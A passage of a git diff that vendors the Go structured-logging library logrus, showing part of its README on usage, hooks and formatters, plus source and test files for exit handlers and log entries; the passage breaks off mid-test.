please use +the lower-case import: `github.com/sirupsen/logrus`. + +#### Example + +The simplest way to use Logrus is simply the package-level exported logger: + +```go +package main + +import ( + log "github.com/sirupsen/logrus" +) + +func main() { + log.WithFields(log.Fields{ + "animal": "walrus", + }).Info("A walrus appears") +} +``` + +Note that it's completely api-compatible with the stdlib logger, so you can +replace your `log` imports everywhere with `log "github.com/sirupsen/logrus"` +and you'll now have the flexibility of Logrus. You can customize it all you +want: + +```go +package main + +import ( + "os" + log "github.com/sirupsen/logrus" +) + +func init() { + // Log as JSON instead of the default ASCII formatter. + log.SetFormatter(&log.JSONFormatter{}) + + // Output to stdout instead of the default stderr + // Can be any io.Writer, see below for File example + log.SetOutput(os.Stdout) + + // Only log the warning severity or above. + log.SetLevel(log.WarnLevel) +} + +func main() { + log.WithFields(log.Fields{ + "animal": "walrus", + "size": 10, + }).Info("A group of walrus emerges from the ocean") + + log.WithFields(log.Fields{ + "omg": true, + "number": 122, + }).Warn("The group's number increased tremendously!") + + log.WithFields(log.Fields{ + "omg": true, + "number": 100, + }).Fatal("The ice breaks!") + + // A common pattern is to re-use fields between logging statements by re-using + // the logrus.Entry returned from WithFields() + contextLogger := log.WithFields(log.Fields{ + "common": "this is a common field", + "other": "I also should be logged always", + }) + + contextLogger.Info("I'll be logged with common and other field") + contextLogger.Info("Me too") +} +``` + +For more advanced usage such as logging to multiple locations from the same +application, you can also create an instance of the `logrus` Logger: + +```go +package main + +import ( + "os" + "github.com/sirupsen/logrus" +) + +// Create a new instance of the logger. You can have any number of instances. +var log = logrus.New() + +func main() { + // The API for setting attributes is a little different than the package level + // exported logger. See Godoc. + log.Out = os.Stdout + + // You could set this to any `io.Writer` such as a file + // file, err := os.OpenFile("logrus.log", os.O_CREATE|os.O_WRONLY, 0666) + // if err == nil { + // log.Out = file + // } else { + // log.Info("Failed to log to file, using default stderr") + // } + + log.WithFields(logrus.Fields{ + "animal": "walrus", + "size": 10, + }).Info("A group of walrus emerges from the ocean") +} +``` + +#### Fields + +Logrus encourages careful, structured logging through logging fields instead of +long, unparseable error messages. For example, instead of: `log.Fatalf("Failed +to send event %s to topic %s with key %d")`, you should log the much more +discoverable: + +```go +log.WithFields(log.Fields{ + "event": event, + "topic": topic, + "key": key, +}).Fatal("Failed to send event") +``` + +We've found this API forces you to think about logging in a way that produces +much more useful logging messages. We've been in countless situations where just +a single added field to a log statement that was already there would've saved us +hours. The `WithFields` call is optional. + +In general, with Logrus using any of the `printf`-family functions should be +seen as a hint you should add a field, however, you can still use the +`printf`-family functions with Logrus. + +#### Default Fields + +Often it's helpful to have fields _always_ attached to log statements in an +application or parts of one. For example, you may want to always log the +`request_id` and `user_ip` in the context of a request. Instead of writing +`log.WithFields(log.Fields{"request_id": request_id, "user_ip": user_ip})` on +every line, you can create a `logrus.Entry` to pass around instead: + +```go +requestLogger := log.WithFields(log.Fields{"request_id": request_id, "user_ip": user_ip}) +requestLogger.Info("something happened on that request") # will log request_id and user_ip +requestLogger.Warn("something not great happened") +``` + +#### Hooks + +You can add hooks for logging levels. For example to send errors to an exception +tracking service on `Error`, `Fatal` and `Panic`, info to StatsD or log to +multiple places simultaneously, e.g. syslog. + +Logrus comes with [built-in hooks](hooks/). Add those, or your custom hook, in +`init`: + +```go +import ( + log "github.com/sirupsen/logrus" + "gopkg.in/gemnasium/logrus-airbrake-hook.v2" // the package is named "airbrake" + logrus_syslog "github.com/sirupsen/logrus/hooks/syslog" + "log/syslog" +) + +func init() { + + // Use the Airbrake hook to report errors that have Error severity or above to + // an exception tracker. You can create custom hooks, see the Hooks section. + log.AddHook(airbrake.NewHook(123, "xyz", "production")) + + hook, err := logrus_syslog.NewSyslogHook("udp", "localhost:514", syslog.LOG_INFO, "") + if err != nil { + log.Error("Unable to connect to local syslog daemon") + } else { + log.AddHook(hook) + } +} +``` +Note: Syslog hook also support connecting to local syslog (Ex. "/dev/log" or "/var/run/syslog" or "/var/run/log"). For the detail, please check the [syslog hook README](hooks/syslog/README.md). + +| Hook | Description | +| ----- | ----------- | +| [Airbrake "legacy"](https://github.com/gemnasium/logrus-airbrake-legacy-hook) | Send errors to an exception tracking service compatible with the Airbrake API V2. Uses [`airbrake-go`](https://github.com/tobi/airbrake-go) behind the scenes. | +| [Airbrake](https://github.com/gemnasium/logrus-airbrake-hook) | Send errors to the Airbrake API V3. Uses the official [`gobrake`](https://github.com/airbrake/gobrake) behind the scenes. | +| [Amazon Kinesis](https://github.com/evalphobia/logrus_kinesis) | Hook for logging to [Amazon Kinesis](https://aws.amazon.com/kinesis/) | +| [Amqp-Hook](https://github.com/vladoatanasov/logrus_amqp) | Hook for logging to Amqp broker (Like RabbitMQ) | +| [Application Insights](https://github.com/jjcollinge/logrus-appinsights) | Hook for logging to [Application Insights](https://azure.microsoft.com/en-us/services/application-insights/) +| [AzureTableHook](https://github.com/kpfaulkner/azuretablehook/) | Hook for logging to Azure Table Storage| +| [Bugsnag](https://github.com/Shopify/logrus-bugsnag/blob/master/bugsnag.go) | Send errors to the Bugsnag exception tracking service. | +| [DeferPanic](https://github.com/deferpanic/dp-logrus) | Hook for logging to DeferPanic | +| [Discordrus](https://github.com/kz/discordrus) | Hook for logging to [Discord](https://discordapp.com/) | +| [ElasticSearch](https://github.com/sohlich/elogrus) | Hook for logging to ElasticSearch| +| [Firehose](https://github.com/beaubrewer/logrus_firehose) | Hook for logging to [Amazon Firehose](https://aws.amazon.com/kinesis/firehose/) +| [Fluentd](https://github.com/evalphobia/logrus_fluent) | Hook for logging to fluentd | +| [Go-Slack](https://github.com/multiplay/go-slack) | Hook for logging to [Slack](https://slack.com) | +| [Graylog](https://github.com/gemnasium/logrus-graylog-hook) | Hook for logging to [Graylog](http://graylog2.org/) | +| [Hiprus](https://github.com/nubo/hiprus) | Send errors to a channel in hipchat. | +| [Honeybadger](https://github.com/agonzalezro/logrus_honeybadger) | Hook for sending exceptions to Honeybadger | +| [InfluxDB](https://github.com/Abramovic/logrus_influxdb) | Hook for logging to influxdb | +| [Influxus](http://github.com/vlad-doru/influxus) | Hook for concurrently logging to [InfluxDB](http://influxdata.com/) | +| [Journalhook](https://github.com/wercker/journalhook) | Hook for logging to `systemd-journald` | +| [KafkaLogrus](https://github.com/tracer0tong/kafkalogrus) | Hook for logging to Kafka | +| [Kafka REST Proxy](https://github.com/Nordstrom/logrus-kafka-rest-proxy) | Hook for logging to [Kafka REST Proxy](https://docs.confluent.io/current/kafka-rest/docs) | +| [LFShook](https://github.com/rifflock/lfshook) | Hook for logging to the local filesystem | +| [Logbeat](https://github.com/macandmia/logbeat) | Hook for logging to [Opbeat](https://opbeat.com/) | +| [Logentries](https://github.com/jcftang/logentriesrus) | Hook for logging to [Logentries](https://logentries.com/) | +| [Logentrus](https://github.com/puddingfactory/logentrus) | Hook for logging to [Logentries](https://logentries.com/) | +| [Logmatic.io](https://github.com/logmatic/logmatic-go) | Hook for logging to [Logmatic.io](http://logmatic.io/) | +| [Logrusly](https://github.com/sebest/logrusly) | Send logs to [Loggly](https://www.loggly.com/) | +| [Logstash](https://github.com/bshuster-repo/logrus-logstash-hook) | Hook for logging to [Logstash](https://www.elastic.co/products/logstash) | +| [Mail](https://github.com/zbindenren/logrus_mail) | Hook for sending exceptions via mail | +| [Mattermost](https://github.com/shuLhan/mattermost-integration/tree/master/hooks/logrus) | Hook for logging to [Mattermost](https://mattermost.com/) | +| [Mongodb](https://github.com/weekface/mgorus) | Hook for logging to mongodb | +| [NATS-Hook](https://github.com/rybit/nats_logrus_hook) | Hook for logging to [NATS](https://nats.io) | +| [Octokit](https://github.com/dorajistyle/logrus-octokit-hook) | Hook for logging to github via octokit | +| [Papertrail](https://github.com/polds/logrus-papertrail-hook) | Send errors to the [Papertrail](https://papertrailapp.com) hosted logging service via UDP. | +| [PostgreSQL](https://github.com/gemnasium/logrus-postgresql-hook) | Send logs to [PostgreSQL](http://postgresql.org) | +| [Promrus](https://github.com/weaveworks/promrus) | Expose number of log messages as [Prometheus](https://prometheus.io/) metrics | +| [Pushover](https://github.com/toorop/logrus_pushover) | Send error via [Pushover](https://pushover.net) | +| [Raygun](https://github.com/squirkle/logrus-raygun-hook) | Hook for logging to [Raygun.io](http://raygun.io/) | +| [Redis-Hook](https://github.com/rogierlommers/logrus-redis-hook) | Hook for logging to a ELK stack (through Redis) | +| [Rollrus](https://github.com/heroku/rollrus) | Hook for sending errors to rollbar | +| [Scribe](https://github.com/sagar8192/logrus-scribe-hook) | Hook for logging to [Scribe](https://github.com/facebookarchive/scribe)| +| [Sentry](https://github.com/evalphobia/logrus_sentry) | Send errors to the Sentry error logging and aggregation service. | +| [Slackrus](https://github.com/johntdyer/slackrus) | Hook for Slack chat. | +| [Stackdriver](https://github.com/knq/sdhook) | Hook for logging to [Google Stackdriver](https://cloud.google.com/logging/) | +| [Sumorus](https://github.com/doublefree/sumorus) | Hook for logging to [SumoLogic](https://www.sumologic.com/)| +| [Syslog](https://github.com/sirupsen/logrus/blob/master/hooks/syslog/syslog.go) | Send errors to remote syslog server. Uses standard library `log/syslog` behind the scenes. | +| [Syslog TLS](https://github.com/shinji62/logrus-syslog-ng) | Send errors to remote syslog server with TLS support. | +| [Telegram](https://github.com/rossmcdonald/telegram_hook) | Hook for logging errors to [Telegram](https://telegram.org/) | +| [TraceView](https://github.com/evalphobia/logrus_appneta) | Hook for logging to [AppNeta TraceView](https://www.appneta.com/products/traceview/) | +| [Typetalk](https://github.com/dragon3/logrus-typetalk-hook) | Hook for logging to [Typetalk](https://www.typetalk.in/) | +| [logz.io](https://github.com/ripcurld00d/logrus-logzio-hook) | Hook for logging to [logz.io](https://logz.io), a Log as a Service using Logstash | +| [SQS-Hook](https://github.com/tsarpaul/logrus_sqs) | Hook for logging to [Amazon Simple Queue Service (SQS)](https://aws.amazon.com/sqs/) | + +#### Level logging + +Logrus has six logging levels: Debug, Info, Warning, Error, Fatal and Panic. + +```go +log.Debug("Useful debugging information.") +log.Info("Something noteworthy happened!") +log.Warn("You should probably take a look at this.") +log.Error("Something failed but I'm not quitting.") +// Calls os.Exit(1) after logging +log.Fatal("Bye.") +// Calls panic() after logging +log.Panic("I'm bailing.") +``` + +You can set the logging level on a `Logger`, then it will only log entries with +that severity or anything above it: + +```go +// Will log anything that is info or above (warn, error, fatal, panic). Default. +log.SetLevel(log.InfoLevel) +``` + +It may be useful to set `log.Level = logrus.DebugLevel` in a debug or verbose +environment if your application has that. + +#### Entries + +Besides the fields added with `WithField` or `WithFields` some fields are +automatically added to all logging events: + +1. `time`. The timestamp when the entry was created. +2. `msg`. The logging message passed to `{Info,Warn,Error,Fatal,Panic}` after + the `AddFields` call. E.g. `Failed to send event.` +3. `level`. The logging level. E.g. `info`. + +#### Environments + +Logrus has no notion of environment. + +If you wish for hooks and formatters to only be used in specific environments, +you should handle that yourself. For example, if your application has a global +variable `Environment`, which is a string representation of the environment you +could do: + +```go +import ( + log "github.com/sirupsen/logrus" +) + +init() { + // do something here to set environment depending on an environment variable + // or command-line flag + if Environment == "production" { + log.SetFormatter(&log.JSONFormatter{}) + } else { + // The TextFormatter is default, you don't actually have to do this. + log.SetFormatter(&log.TextFormatter{}) + } +} +``` + +This configuration is how `logrus` was intended to be used, but JSON in +production is mostly only useful if you do log aggregation with tools like +Splunk or Logstash. + +#### Formatters + +The built-in logging formatters are: + +* `logrus.TextFormatter`. Logs the event in colors if stdout is a tty, otherwise + without colors. + * *Note:* to force colored output when there is no TTY, set the `ForceColors` + field to `true`. To force no colored output even if there is a TTY set the + `DisableColors` field to `true`. For Windows, see + [github.com/mattn/go-colorable](https://github.com/mattn/go-colorable). + * All options are listed in the [generated docs](https://godoc.org/github.com/sirupsen/logrus#TextFormatter). +* `logrus.JSONFormatter`. Logs fields as JSON. + * All options are listed in the [generated docs](https://godoc.org/github.com/sirupsen/logrus#JSONFormatter). + +Third party logging formatters: + +* [`FluentdFormatter`](https://github.com/joonix/log). Formats entries that can be parsed by Kubernetes and Google Container Engine. +* [`logstash`](https://github.com/bshuster-repo/logrus-logstash-hook). Logs fields as [Logstash](http://logstash.net) Events. +* [`prefixed`](https://github.com/x-cray/logrus-prefixed-formatter). Displays log entry source along with alternative layout. +* [`zalgo`](https://github.com/aybabtme/logzalgo). Invoking the P͉̫o̳̼̊w̖͈̰͎e̬͔̭͂r͚̼̹̲ ̫͓͉̳͈ō̠͕͖̚f̝͍̠ ͕̲̞͖͑Z̖̫̤̫ͪa͉̬͈̗l͖͎g̳̥o̰̥̅!̣͔̲̻͊̄ ̙̘̦̹̦. + +You can define your formatter by implementing the `Formatter` interface, +requiring a `Format` method. `Format` takes an `*Entry`. `entry.Data` is a +`Fields` type (`map[string]interface{}`) with all your fields as well as the +default ones (see Entries section above): + +```go +type MyJSONFormatter struct { +} + +log.SetFormatter(new(MyJSONFormatter)) + +func (f *MyJSONFormatter) Format(entry *Entry) ([]byte, error) { + // Note this doesn't include Time, Level and Message which are available on + // the Entry. Consult `godoc` on information about those fields or read the + // source of the official loggers. + serialized, err := json.Marshal(entry.Data) + if err != nil { + return nil, fmt.Errorf("Failed to marshal fields to JSON, %v", err) + } + return append(serialized, '\n'), nil +} +``` + +#### Logger as an `io.Writer` + +Logrus can be transformed into an `io.Writer`. That writer is the end of an `io.Pipe` and it is your responsibility to close it. + +```go +w := logger.Writer() +defer w.Close() + +srv := http.Server{ + // create a stdlib log.Logger that writes to + // logrus.Logger. + ErrorLog: log.New(w, "", 0), +} +``` + +Each line written to that writer will be printed the usual way, using formatters +and hooks. The level for those entries is `info`. + +This means that we can override the standard library logger easily: + +```go +logger := logrus.New() +logger.Formatter = &logrus.JSONFormatter{} + +// Use logrus for standard log output +// Note that `log` here references stdlib's log +// Not logrus imported under the name `log`. +log.SetOutput(logger.Writer()) +``` + +#### Rotation + +Log rotation is not provided with Logrus. Log rotation should be done by an +external program (like `logrotate(8)`) that can compress and delete old log +entries. It should not be a feature of the application-level logger. + +#### Tools + +| Tool | Description | +| ---- | ----------- | +|[Logrus Mate](https://github.com/gogap/logrus_mate)|Logrus mate is a tool for Logrus to manage loggers, you can initial logger's level, hook and formatter by config file, the logger will generated with different config at different environment.| +|[Logrus Viper Helper](https://github.com/heirko/go-contrib/tree/master/logrusHelper)|An Helper around Logrus to wrap with spf13/Viper to load configuration with fangs! And to simplify Logrus configuration use some behavior of [Logrus Mate](https://github.com/gogap/logrus_mate). [sample](https://github.com/heirko/iris-contrib/blob/master/middleware/logrus-logger/example) | + +#### Testing + +Logrus has a built in facility for asserting the presence of log messages. This is implemented through the `test` hook and provides: + +* decorators for existing logger (`test.NewLocal` and `test.NewGlobal`) which basically just add the `test` hook +* a test logger (`test.NewNullLogger`) that just records log messages (and does not output any): + +```go +import( + "github.com/sirupsen/logrus" + "github.com/sirupsen/logrus/hooks/test" + "github.com/stretchr/testify/assert" + "testing" +) + +func TestSomething(t*testing.T){ + logger, hook := test.NewNullLogger() + logger.Error("Helloerror") + + assert.Equal(t, 1, len(hook.Entries)) + assert.Equal(t, logrus.ErrorLevel, hook.LastEntry().Level) + assert.Equal(t, "Helloerror", hook.LastEntry().Message) + + hook.Reset() + assert.Nil(t, hook.LastEntry()) +} +``` + +#### Fatal handlers + +Logrus can register one or more functions that will be called when any `fatal` +level message is logged. The registered handlers will be executed before +logrus performs a `os.Exit(1)`. This behavior may be helpful if callers need +to gracefully shutdown. Unlike a `panic("Something went wrong...")` call which can be intercepted with a deferred `recover` a call to `os.Exit(1)` can not be intercepted. + +``` +... +handler := func() { + // gracefully shutdown something... +} +logrus.RegisterExitHandler(handler) +... +``` + +#### Thread safety + +By default Logger is protected by mutex for concurrent writes, this mutex is invoked when calling hooks and writing logs. +If you are sure such locking is not needed, you can call logger.SetNoLock() to disable the locking. + +Situation when locking is not needed includes: + +* You have no hooks registered, or hooks calling is already thread-safe. + +* Writing to logger.Out is already thread-safe, for example: + + 1) logger.Out is protected by locks. + + 2) logger.Out is a os.File handler opened with `O_APPEND` flag, and every write is smaller than 4k. (This allow multi-thread/multi-process writing) + + (Refer to http://www.notthewizard.com/2014/06/17/are-files-appends-really-atomic/) diff --git a/vendor/github.com/Sirupsen/logrus/alt_exit.go b/vendor/github.com/Sirupsen/logrus/alt_exit.go new file mode 100644 index 0000000000..8af90637a9 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/alt_exit.go @@ -0,0 +1,64 @@ +package logrus + +// The following code was sourced and modified from the +// https://github.com/tebeka/atexit package governed by the following license: +// +// Copyright (c) 2012 Miki Tebeka . +// +// Permission is hereby granted, free of charge, to any person obtaining a copy of +// this software and associated documentation files (the "Software"), to deal in +// the Software without restriction, including without limitation the rights to +// use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of +// the Software, and to permit persons to whom the Software is furnished to do so, +// subject to the following conditions: +// +// The above copyright notice and this permission notice shall be included in all +// copies or substantial portions of the Software. +// +// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS +// FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR +// COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER +// IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN +// CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +import ( + "fmt" + "os" +) + +var handlers = []func(){} + +func runHandler(handler func()) { + defer func() { + if err := recover(); err != nil { + fmt.Fprintln(os.Stderr, "Error: Logrus exit handler error:", err) + } + }() + + handler() +} + +func runHandlers() { + for _, handler := range handlers { + runHandler(handler) + } +} + +// Exit runs all the Logrus atexit handlers and then terminates the program using os.Exit(code) +func Exit(code int) { + runHandlers() + os.Exit(code) +} + +// RegisterExitHandler adds a Logrus Exit handler, call logrus.Exit to invoke +// all handlers. The handlers will also be invoked when any Fatal log entry is +// made. +// +// This method is useful when a caller wishes to use logrus to log a fatal +// message but also needs to gracefully shutdown. An example usecase could be +// closing database connections, or sending a alert that the application is +// closing. +func RegisterExitHandler(handler func()) { + handlers = append(handlers, handler) +} diff --git a/vendor/github.com/Sirupsen/logrus/alt_exit_test.go b/vendor/github.com/Sirupsen/logrus/alt_exit_test.go new file mode 100644 index 0000000000..a08b1a898f --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/alt_exit_test.go @@ -0,0 +1,83 @@ +package logrus + +import ( + "io/ioutil" + "log" + "os" + "os/exec" + "path/filepath" + "testing" + "time" +) + +func TestRegister(t *testing.T) { + current := len(handlers) + RegisterExitHandler(func() {}) + if len(handlers) != current+1 { + t.Fatalf("expected %d handlers, got %d", current+1, len(handlers)) + } +} + +func TestHandler(t *testing.T) { + tempDir, err := ioutil.TempDir("", "test_handler") + if err != nil { + log.Fatalf("can't create temp dir. %q", err) + } + defer os.RemoveAll(tempDir) + + gofile := filepath.Join(tempDir, "gofile.go") + if err := ioutil.WriteFile(gofile, testprog, 0666); err != nil { + t.Fatalf("can't create go file. %q", err) + } + + outfile := filepath.Join(tempDir, "outfile.out") + arg := time.Now().UTC().String() + err = exec.Command("go", "run", gofile, outfile, arg).Run() + if err == nil { + t.Fatalf("completed normally, should have failed") + } + + data, err := ioutil.ReadFile(outfile) + if err != nil { + t.Fatalf("can't read output file %s. %q", outfile, err) + } + + if string(data) != arg { + t.Fatalf("bad data. Expected %q, got %q", data, arg) + } +} + +var testprog = []byte(` +// Test program for atexit, gets output file and data as arguments and writes +// data to output file in atexit handler. +package main + +import ( + "github.com/sirupsen/logrus" + "flag" + "fmt" + "io/ioutil" +) + +var outfile = "" +var data = "" + +func handler() { + ioutil.WriteFile(outfile, []byte(data), 0666) +} + +func badHandler() { + n := 0 + fmt.Println(1/n) +} + +func main() { + flag.Parse() + outfile = flag.Arg(0) + data = flag.Arg(1) + + logrus.RegisterExitHandler(handler) + logrus.RegisterExitHandler(badHandler) + logrus.Fatal("Bye bye") +} +`) diff --git a/vendor/github.com/Sirupsen/logrus/appveyor.yml b/vendor/github.com/Sirupsen/logrus/appveyor.yml new file mode 100644 index 0000000000..96c2ce15f8 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/appveyor.yml @@ -0,0 +1,14 @@ +version: "{build}" +platform: x64 +clone_folder: c:\gopath\src\github.com\sirupsen\logrus +environment: + GOPATH: c:\gopath +branches: + only: + - master +install: + - set PATH=%GOPATH%\bin;c:\go\bin;%PATH% + - go version +build_script: + - go get -t + - go test diff --git a/vendor/github.com/Sirupsen/logrus/doc.go b/vendor/github.com/Sirupsen/logrus/doc.go new file mode 100644 index 0000000000..da67aba06d --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/doc.go @@ -0,0 +1,26 @@ +/* +Package logrus is a structured logger for Go, completely API compatible with the standard library logger. + + +The simplest way to use Logrus is simply the package-level exported logger: + + package main + + import ( + log "github.com/sirupsen/logrus" + ) + + func main() { + log.WithFields(log.Fields{ + "animal": "walrus", + "number": 1, + "size": 10, + }).Info("A walrus appears") + } + +Output: + time="2015-09-07T08:48:33Z" level=info msg="A walrus appears" animal=walrus number=1 size=10 + +For a full guide visit https://github.com/sirupsen/logrus +*/ +package logrus diff --git a/vendor/github.com/Sirupsen/logrus/entry.go b/vendor/github.com/Sirupsen/logrus/entry.go new file mode 100644 index 0000000000..778f4c9f0d --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/entry.go @@ -0,0 +1,288 @@ +package logrus + +import ( + "bytes" + "fmt" + "os" + "sync" + "time" +) + +var bufferPool *sync.Pool + +func init() { + bufferPool = &sync.Pool{ + New: func() interface{} { + return new(bytes.Buffer) + }, + } +} + +// Defines the key when adding errors using WithError. +var ErrorKey = "error" + +// An entry is the final or intermediate Logrus logging entry. It contains all +// the fields passed with WithField{,s}. It's finally logged when Debug, Info, +// Warn, Error, Fatal or Panic is called on it. These objects can be reused and +// passed around as much as you wish to avoid field duplication. +type Entry struct { + Logger *Logger + + // Contains all the fields set by the user. + Data Fields + + // Time at which the log entry was created + Time time.Time + + // Level the log entry was logged at: Debug, Info, Warn, Error, Fatal or Panic + // This field will be set on entry firing and the value will be equal to the one in Logger struct field. + Level Level + + // Message passed to Debug, Info, Warn, Error, Fatal or Panic + Message string + + // When formatter is called in entry.log(), an Buffer may be set to entry + Buffer *bytes.Buffer +} + +func NewEntry(logger *Logger) *Entry { + return &Entry{ + Logger: logger, + // Default is three fields, give a little extra room + Data: make(Fields, 5), + } +} + +// Returns the string representation from the reader and ultimately the +// formatter. +func (entry *Entry) String() (string, error) { + serialized, err := entry.Logger.Formatter.Format(entry) + if err != nil { + return "", err + } + str := string(serialized) + return str, nil +} + +// Add an error as single field (using the key defined in ErrorKey) to the Entry. +func (entry *Entry) WithError(err error) *Entry { + return entry.WithField(ErrorKey, err) +} + +// Add a single field to the Entry. +func (entry *Entry) WithField(key string, value interface{}) *Entry { + return entry.WithFields(Fields{key: value}) +} + +// Add a map of fields to the Entry. +func (entry *Entry) WithFields(fields Fields) *Entry { + data := make(Fields, len(entry.Data)+len(fields)) + for k, v := range entry.Data { + data[k] = v + } + for k, v := range fields { + data[k] = v + } + return &Entry{Logger: entry.Logger, Data: data} +} + +// This function is not declared with a pointer value because otherwise +// race conditions will occur when using multiple goroutines +func (entry Entry) log(level Level, msg string) { + var buffer *bytes.Buffer + entry.Time = time.Now() + entry.Level = level + entry.Message = msg + + entry.fireHooks() + + buffer = bufferPool.Get().(*bytes.Buffer) + buffer.Reset() + defer bufferPool.Put(buffer) + entry.Buffer = buffer + + entry.write() + + entry.Buffer = nil + + // To avoid Entry#log() returning a value that only would make sense for + // panic() to use in Entry#Panic(), we avoid the allocation by checking + // directly here. + if level <= PanicLevel { + panic(&entry) + } +} + +// This function is not declared with a pointer value because otherwise +// race conditions will occur when using multiple goroutines +func (entry Entry) fireHooks() { + entry.Logger.mu.Lock() + defer entry.Logger.mu.Unlock() + err := entry.Logger.Hooks.Fire(entry.Level, &entry) + if err != nil { + fmt.Fprintf(os.Stderr, "Failed to fire hook: %v\n", err) + } +} + +func (entry *Entry) write() { + serialized, err := entry.Logger.Formatter.Format(entry) + entry.Logger.mu.Lock() + defer entry.Logger.mu.Unlock() + if err != nil { + fmt.Fprintf(os.Stderr, "Failed to obtain reader, %v\n", err) + } else { + _, err = entry.Logger.Out.Write(serialized) + if err != nil { + fmt.Fprintf(os.Stderr, "Failed to write to log, %v\n", err) + } + } +} + +func (entry *Entry) Debug(args ...interface{}) { + if entry.Logger.level() >= DebugLevel { + entry.log(DebugLevel, fmt.Sprint(args...)) + } +} + +func (entry *Entry) Print(args ...interface{}) { + entry.Info(args...) +} + +func (entry *Entry) Info(args ...interface{}) { + if entry.Logger.level() >= InfoLevel { + entry.log(InfoLevel, fmt.Sprint(args...)) + } +} + +func (entry *Entry) Warn(args ...interface{}) { + if entry.Logger.level() >= WarnLevel { + entry.log(WarnLevel, fmt.Sprint(args...)) + } +} + +func (entry *Entry) Warning(args ...interface{}) { + entry.Warn(args...) +} + +func (entry *Entry) Error(args ...interface{}) { + if entry.Logger.level() >= ErrorLevel { + entry.log(ErrorLevel, fmt.Sprint(args...)) + } +} + +func (entry *Entry) Fatal(args ...interface{}) { + if entry.Logger.level() >= FatalLevel { + entry.log(FatalLevel, fmt.Sprint(args...)) + } + Exit(1) +} + +func (entry *Entry) Panic(args ...interface{}) { + if entry.Logger.level() >= PanicLevel { + entry.log(PanicLevel, fmt.Sprint(args...)) + } + panic(fmt.Sprint(args...)) +} + +// Entry Printf family functions + +func (entry *Entry) Debugf(format string, args ...interface{}) { + if entry.Logger.level() >= DebugLevel { + entry.Debug(fmt.Sprintf(format, args...)) + } +} + +func (entry *Entry) Infof(format string, args ...interface{}) { + if entry.Logger.level() >= InfoLevel { + entry.Info(fmt.Sprintf(format, args...)) + } +} + +func (entry *Entry) Printf(format string, args ...interface{}) { + entry.Infof(format, args...) +} + +func (entry *Entry) Warnf(format string, args ...interface{}) { + if entry.Logger.level() >= WarnLevel { + entry.Warn(fmt.Sprintf(format, args...)) + } +} + +func (entry *Entry) Warningf(format string, args ...interface{}) { + entry.Warnf(format, args...) +} + +func (entry *Entry) Errorf(format string, args ...interface{}) { + if entry.Logger.level() >= ErrorLevel { + entry.Error(fmt.Sprintf(format, args...)) + } +} + +func (entry *Entry) Fatalf(format string, args ...interface{}) { + if entry.Logger.level() >= FatalLevel { + entry.Fatal(fmt.Sprintf(format, args...)) + } + Exit(1) +} + +func (entry *Entry) Panicf(format string, args ...interface{}) { + if entry.Logger.level() >= PanicLevel { + entry.Panic(fmt.Sprintf(format, args...)) + } +} + +// Entry Println family functions + +func (entry *Entry) Debugln(args ...interface{}) { + if entry.Logger.level() >= DebugLevel { + entry.Debug(entry.sprintlnn(args...)) + } +} + +func (entry *Entry) Infoln(args ...interface{}) { + if entry.Logger.level() >= InfoLevel { + entry.Info(entry.sprintlnn(args...)) + } +} + +func (entry *Entry) Println(args ...interface{}) { + entry.Infoln(args...) +} + +func (entry *Entry) Warnln(args ...interface{}) { + if entry.Logger.level() >= WarnLevel { + entry.Warn(entry.sprintlnn(args...)) + } +} + +func (entry *Entry) Warningln(args ...interface{}) { + entry.Warnln(args...) +} + +func (entry *Entry) Errorln(args ...interface{}) { + if entry.Logger.level() >= ErrorLevel { + entry.Error(entry.sprintlnn(args...)) + } +} + +func (entry *Entry) Fatalln(args ...interface{}) { + if entry.Logger.level() >= FatalLevel { + entry.Fatal(entry.sprintlnn(args...)) + } + Exit(1) +} + +func (entry *Entry) Panicln(args ...interface{}) { + if entry.Logger.level() >= PanicLevel { + entry.Panic(entry.sprintlnn(args...)) + } +} + +// Sprintlnn => Sprint no newline. This is to get the behavior of how +// fmt.Sprintln where spaces are always added between operands, regardless of +// their type. Instead of vendoring the Sprintln implementation to spare a +// string allocation, we do the simplest thing. +func (entry *Entry) sprintlnn(args ...interface{}) string { + msg := fmt.Sprintln(args...) + return msg[:len(msg)-1] +} diff --git a/vendor/github.com/Sirupsen/logrus/entry_test.go b/vendor/github.com/Sirupsen/logrus/entry_test.go new file mode 100644 index 0000000000..a81e2b3834 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/entry_test.go @@ -0,0 +1,115 @@ +package logrus + +import ( + "bytes" + "fmt" + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestEntryWithError(t *testing.T) { + + assert := assert.New(t) + + defer func() { + ErrorKey = "error" + }() + + err := fmt.Errorf("kaboom at layer %d", 4711) + + assert.Equal(err, WithError(err).Data["error"]) + + logger := New() + logger.Out = &bytes.Buffer{} + entry := NewEntry(logger) + + assert.Equal(err, entry.WithError(err).Data["error"]) + + ErrorKey = "err" + + assert.Equal(err, entry.WithError(err).Data["err"]) + +} + +func TestEntryPanicln(t *testing.T) { + errBoom := fmt.Errorf("boom time") + + defer func() { + p := recover() + assert.NotNil(t, p) + + switch pVal := p.(type) { + case *Entry: + assert.Equal(t, "kaboom", pVal.Message) + assert.Equal(t, errBoom, pVal.Data["err"]) + default: + t.Fatalf("want type *Entry, got %T: %#v", pVal, pVal) + } + }() + + logger := New() + logger.Out = &bytes.Buffer{} + entry := NewEntry(logger) + entry.WithField("err", errBoom).Panicln("kaboom") +} + +func TestEntryPanicf(t *testing.T) { + errBoom := fmt.Errorf("boom again") + + defer func() { + p := recover() + assert.NotNil(t, p) + + switch pVal := p.(type) { + case *Entry: + assert.Equal(t, "kaboom true", pVal.Message) + assert.Equal(t, errBoom, pVal.Data["err"]) + default: + t.Fatalf("want type *Entry, got %T: %#v", pVal, pVal) + } + }() + + logger := New() + 